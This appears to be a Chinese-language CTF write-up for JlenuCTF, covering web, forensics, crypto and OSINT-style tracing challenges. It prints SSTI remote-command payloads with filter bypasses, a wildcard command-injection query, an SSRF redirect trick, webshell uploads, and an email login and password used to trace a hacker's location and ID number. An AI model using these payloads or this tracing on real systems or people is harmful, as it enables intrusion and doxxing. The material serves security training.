easy_login(web)
首先看网页源码,发现一段加密密钥
又看到有两个js文件是来自平台的,其他文件指向官网,下载两个文件
找到一段加密函数,看到用的是ECB 方式
function _etd2(_p0, _p1) { |
抓包验证一下,直接出密码,接下来就是爆破密码,加密,爆破发送
关键是使用bp中的插件:,插件名称:BurpCrypto
BDE_CAT(web)
开局一张猫
查看源码:
<img src='cat.jpg' height=400><!-- is_debug --> |
访问?is_debug 得到源码:
|
$_SERVER['QUERY_STRING']
意思:
结果:
$_SERVER['QUERY_STRING'] = "p=222"; |
查询的不能含有 _
和 %
且只有get c_m_d
才能执行system
php解析特性可以使用+
和.
和代替成 _
/sandboxed_bin/
后面可以拼接 cat
payload:
?c.m.d=???+????.??? |
flag: JlenuCTF{hPHPPP_c@t_Bypass}
Easy_SSRF(web)
先看一下网页源码
经过测试,服务器上搭建一个302跳转页面 或者 直接生成个
http://127.0.0.1/flag.php的短链接打过去就行了
1.php:
|
访问:
http://120.79.25.56:5566/?url=http://x.x.x.x/1.php |
flag: JlenuCTF{ssrf_is_so_esay!}
Strange_SQLI(web)
index.php?id=1%20And%201=1--+ |
测了几次整形注入发现有时候对的也会报错,而且好像还是有规律的报错,导致我不能确定到底是不是过滤,索性直接猜表 和字段,真猜出来了
后来hint:
题目有个动态随机waf用来防止sqlmap,如单条语句无法回显,请多试几次 |
MIAOHUB(web)
以为是文件上传,谁知道是SSTI???
flask 2.0
发现注入点
查看config:
测了一下,过滤 .
和[ ]
attr()就行了,多亏了这篇文章,让我又学习了一点SSTI的bypass
payload:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} |
或者
{{config|attr('__class__')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('ls')|attr('read')()}} |
flag: Jlenu{MiaohUB_SO_CUTE!!!!}
CMS_audit(web)
弱密码登录
漏洞位置:上传LOGO
controller\CallAction.class.php |
public function upLoad() { |
跟进LogoUpload类,看到验证类型
//验证类型 |
跟进,只判断类型
private $typeArr = array('image/jpeg','image/pjpeg','image/png','image/x-png','image/gif'); //类型合集 |
上传shell
flag: Jlenu{GOOD_Y0U_Are_HACKED!!!}
warm-up(misc)
直接查看源码,发现flag,unicode解码
flag: JlenuCTF{Y0u_ArE_HOrse_killER}
MY XP(misc)
./volatility -f 111.vmem imageinfo //imageinfo:查询对应镜像文件的系统信息 |
./volatility -f 111.vmem --profile=WinXPSP2x86 psscan //查看进程 |
./volatility -f 111.vmem –profile=WinXPSP2x86 filescan |grep -E ‘jpg|png|jpeg|bmp|gif|zip|txt’ //查找文件
./volatility -f 111.vmem –profile=WinXPSP2x86 dumpfiles -Q 0x0000000001d27bf0 –dump-dir=./ //dump文件
打开发现base64,解码即可
flag: JlenuCTF{You_ArE_F1nd_mY_XPPPP}
WHATS HAPPEN?(CRYPTO)
直接盲文比对
flag: JlenuCTF{BLINDNEEDHELP}
SIMPIOT(HAPPYGAME)
flag: JlenuCTF{ha-easyy-iOt}
社工一
描述:
- 魔法少女所维护的网站被黑客攻击了,你是魔法少女请过来的外援大佬,希望你能够帮助魔法少女来进行溯源找到黑客,已知魔法少女对网站进行了备份,加油。 找到后门文件,将黑客id直接提交至平台,无需包装
D盾发现后门文件
flag: HSYM
蚁剑连上
社工二
描述
- 很好,你已经找到了黑客的id,请继续溯源,寻找黑客的代理服务器的ip 将代理服务器ip直接提交
社工三
描述:
- 非常棒,既然你已经找到了黑客的服务器,尝试访问,并找出他的博客后台密码 找出黑客的博客后台密码,直接提交
账号:S114514W@protonmail.com
密码:HSYM20020301
社工四
描述:
- good,该找的都找得差不多了黑客的邮箱里面可能会有些好东西哦 找出黑客的真实地理位置,地理位置名称提交
- 先拿shell,然后找邮箱配置备份文件
进入后台,在外观处写shell
路径:
1.15.98.31/wp-admin/theme-editor.php?file=upload.php&theme=CorePressWPTheme-main |
蚁剑后
使用密码登录邮箱,看到一张照片,下载下来
发现GPS
先转换:
在查找:
社工五
描述:
- 非常棒,抓到他。 找到黑客的身份证号,直接提交